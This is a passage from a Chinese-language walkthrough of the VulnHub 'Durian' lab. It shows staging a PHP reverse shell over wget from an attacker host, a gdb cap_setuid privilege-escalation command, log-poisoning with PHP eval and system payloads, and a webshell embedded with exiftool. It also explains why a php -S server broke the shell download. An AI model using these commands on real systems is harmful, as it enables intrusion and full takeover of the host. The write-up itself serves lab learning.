于是我想到尝试用wget与kali搭建临时服务器的方法去上传一个反弹shell,在通过直接解析或者文件包含漏洞解析去触发。
没想到,这才是噩梦的开始。
噩梦的开始
于是我尝试让靶机执行wget命令去拿我的shell文件
先准备好shell.php文件
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ locate reverse-shell |grep share
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/metasploit-framework/docs/metasploit-framework.wiki/How-to-use-a-reverse-shell-in-Metasploit.md
/usr/share/webshells/perl/perl-reverse-shell.pl然后用cp 命令复制他到当前目录,或者到/tmp临时目录,然后用vim编辑文件的ip与端口参数
然后我们要在这个目录开启临时服务器,在这里,我做了导致我浪费了好几个小时的选择,我选择php启动了临时服务器
并且启动一下监听
并且向我们之前的参数进行RCE,用wget从kali中获取shell.php文件
这时我发现了一件非常恐怖的事情
我的监听竟然链接上了自己(kali)
并且我还没有去解析php代码,没有去触发反弹shell,怎么会这样,当时的我无法理解,于是先选择忽略他,这个问题在后续会解答。
重启启动监听,并且去访问`http://10.10.10.24/blog/shell.php
竟然显示拒绝连接???why???
难道是我的卡里出问题了,于是我开始一轮轮的检查
先是测试kali能否收到其他靶机的反弹shell,尝试测试了这台靶机能否ping通kali,又去询问了deepseek大人,然后多次比对了writeup,
唯一与writeup中不同的是writeup中用的是python搭建的临时服务器,于是我尝试使用python启动临时服务器
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ python3 -m http.server 80
Traceback (most recent call last):
File "<frozen runpy>", line 198, in _run_module_as_main
File "<frozen runpy>", line 88, in _run_code
File "/usr/lib/python3.13/http/server.py", line 1323, in <module>
test(
~~~~^
HandlerClass=handler_class,
^^^^^^^^^^^^^^^^^^^^^^^^^^^
...<3 lines>...
protocol=args.protocol,
^^^^^^^^^^^^^^^^^^^^^^^
)
^
File "/usr/lib/python3.13/http/server.py", line 1270, in test
with ServerClass(addr, HandlerClass) as httpd:
~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 457, in __init__
self.server_bind()
~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3.13/http/server.py", line 1317, in server_bind
return super().server_bind()
~~~~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3.13/http/server.py", line 136, in server_bind
socketserver.TCPServer.server_bind(self)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 478, in server_bind
self.socket.bind(self.server_address)
~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^
OSError: [Errno 98] Address already in use竟然报错了,其实这里距离问题的答案已经很近了,但是当时的我已经经过了8h的问题排查,于是选择了先休息一下,重置一下思路。
重振旗鼓
进行了一番总结了之后,发现我的RCE似乎基本没有命令的限制,因为再排查问题的过程中,我使用了非常多的命令去测试kali与靶机连通性,于是我意识到可能靶机并没有对bash命令做限制,而是其中的某个环节出了问题。
在把先前直接命令执行反弹shell的包丢给ai后,他告诉我没有进行url编码!!!!!!!!!!
没想到我竟然忽略了这么小的一个问题,于是我将反弹shell进行url编码后再进行RCE,并且同时监听1234端口。
并且成功获取到了反弹shell
不容易:(
内网提权
先进行普通的信息收集,先检查sudo权限
www-data@durian:/var/www/html/cgi-data$ sudo -l
sudo -l
Matching Defaults entries for www-data on durian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on durian:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /bin/ping
www-data@durian:/var/www/html/cgi-data$ 显示可以无密码使用shutdown命令和ping命令
都没什么太大的利用价值
再看看getcap的结果
www-data@durian:/var/www/html/cgi-data$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/gdb = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep发现gdb有设置uid的权限
ai告诉我可以尝试这条命令
/usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit做一个补充:https://github.com/Meowmycks/OSCPprep-Durian?tab=readme-ov-file这篇文章中提到在GTFbins:https://gtfobins.org/
中可以找到这个提权方法,但是我并没有找到。
于是我进行尝试
发现提权成功,获取一下flag
成功拿到,这台靶机到这里就算是结束了。
进一步研究
wget获取的文件无法触发反弹shell的原因
虽然靶机结束了,但是学习还没有结束,用wget+php临时服务器上传的php文件无法触发反弹shell的问题还没有解决。
于是我计划先访问我上传文件的目录去检查文件的完整性。
于是我
vi /var/www/html/blog/shell.php
竟然里面只有一句拒绝连接的语句,我们的反弹shell根本没有成功上传!!!
那一定是在文件上传之前的某个环节出现了问题
于是我又检查了一遍,尝试更换python来进行临时服务器搭建
再次遇到了先前的报错
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ python3 -m http.server 80
Traceback (most recent call last):
File "<frozen runpy>", line 198, in _run_module_as_main
File "<frozen runpy>", line 88, in _run_code
File "/usr/lib/python3.13/http/server.py", line 1323, in <module>
test(
~~~~^
HandlerClass=handler_class,
^^^^^^^^^^^^^^^^^^^^^^^^^^^
...<3 lines>...
protocol=args.protocol,
^^^^^^^^^^^^^^^^^^^^^^^
)
^
File "/usr/lib/python3.13/http/server.py", line 1270, in test
with ServerClass(addr, HandlerClass) as httpd:
~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 457, in __init__
self.server_bind()
~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3.13/http/server.py", line 1317, in server_bind
return super().server_bind()
~~~~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3.13/http/server.py", line 136, in server_bind
socketserver.TCPServer.server_bind(self)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 478, in server_bind
self.socket.bind(self.server_address)
~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^
OSError: [Errno 98] Address already in use丢给ai看看,他说我的80端口被占用了
于是尝试检查端口占用并杀死进程
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ sudo lsof -i :80 | grep php
[sudo] password for kali:
php 8948 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
php 8951 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
php 8953 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
php 8954 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
php 8955 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
php 8956 kali 4u IPv4 74808 0t0 TCP *:http (LISTEN)
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ pkill -f "php -S"
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ sudo lsof -i :80 | grep php 杀死进程后再用python搭建临时服务器
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...成功了
再用RCE去下载文件,存为shellx.php
可以看到下载成功
启动监听,并访问目录
成功获取shell,那为什么会导致这个原因???
ai是这么说的
你发现的问题非常关键:你的Kali内置PHP服务器(**php -S**)并没有将 **shell.php** 文件作为“代码文本”提供下载,而是直接把它当作一个PHP程序执行了,所以靶机下载到的是这个程序执行后返回的结果(那个Connection refused的错误页面),而不是代码本身。
这解释了为什么你下载到的文件内容是 Connection refused (111)。要解决这个问题,核心是让Kali提供一个不会执行PHP的、纯粹的文件下载服务。
所以,这也解释了为什么会收到kali自己的反弹shell,因为在靶机用wget访问kali的shell.php
文件时,shell文件被解析了。
总结一下就是在上传php文件时不要使用php去搭建临时服务器,python搭建的临时服务器是纯静态的兼容性比php搭建的临时服务器要好。
不同日志投毒的方法
登入日志投毒
利用前面提取的指纹:OpenLiteSpeed
问ai该服务的默认日志路径
/usr/local/lsws/logs/access.log
/usr/local/lsws/logs/error.log
/usr/local/lsws/logs/event.log
/usr/local/lsws/logs/password访问error.log和access.log
都有正确的回显
但/usr/local/lsws/logs/password
路径无法访问
在7080的登入筐尝试登入触发日志
查看日志
显示用户名:Mxc登入失败
尝试在用户名这里注入php代码
查看日志
竟然被转义了,尝试绕过
用base64编码尝试
<?php eval(base64_decode('c3lzdGVtKCdpZCcpOw=='));?>绕过失败
2026-01-25 05:02:20.270372 [NOTICE] [10.10.10.128:52836:HTTP2-3#_AdminVHost] [STDERR] [WebAdmin Console] Failed Login Attempt - username:\<\?php eval\(base64_decode\('c3lzdGVtKCdpZCcpOw=='\)\)\;\?\> ip:10.10.10.128 url:这里对<,?等都进行的转义,于是我陷入了一个误区,我认为在
https://github.com/Meowmycks/OSCPprep-Durian
这篇文章中,作者通过了某种方式绕过了这些关键字转义,于是我再次陷入了迷茫
于是我选择给这位大佬发邮件去询问这个问题
最后我意识到在/protect路径下,还有另一个登入页面
可能这篇文章的作者是通过另一个登入页面的登入筐进行注入的
于是我进行尝试
2026-01-25 05:07:22.679210 [INFO] [10.10.10.128:50526#Example] User 'uid=33(www-data) gid=33(www-data) groups=33(www-data)发现成功执行了,后续的利用路径就跟先前的利用一样了
文件上传功能点无法触发反弹shell的原因
第一次我在文件上传功能点上传了一个shell.php改后缀的文件
虽然他返回了路径/tmp/phpOA0P3X
但下方显示
file is not jpg, not stored.他检测到这个文件不是jpg文件,于是我决定采用exiftool隐写技术去
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ cp /home/kali/Vulnhub/Broken/img_forest.jpg 1.jpg
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ exiftool -Comment='<?php system($_GET["cmd"]); ?>' 1.jpg
1 image files updated
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ mv 1.jpg 1.php.jpg 这回上传成功了
尝试用LFI去触发
发现都触发不了
用先前的shell去查看路径
www-data@durian:/tmp$ ls -alih
ls -alih
total 8.0K
2097164 drwxrwxrwt 2 root root 4.0K Jan 24 00:39 .
2 drwxr-xr-x 18 root root 4.0K Sep 7 2020 .. 发现没有文件,尝试用find命令去查找
www-data@durian:/tmp$ find / -name "uploadfile_1.php.jpg" 2>/dev/null
find / -name "uploadfile_1.php.jpg" 2>/dev/null
www-data@durian:/tmp$ find / -name "phpIqTS0R" 2>/dev/null
find / -name "phpIqTS0R" 2>/dev/null发现没有这个路径的文件
说明文件根本没有上传到服务器
这就是导致文件上传这条路走不通的原因
!!!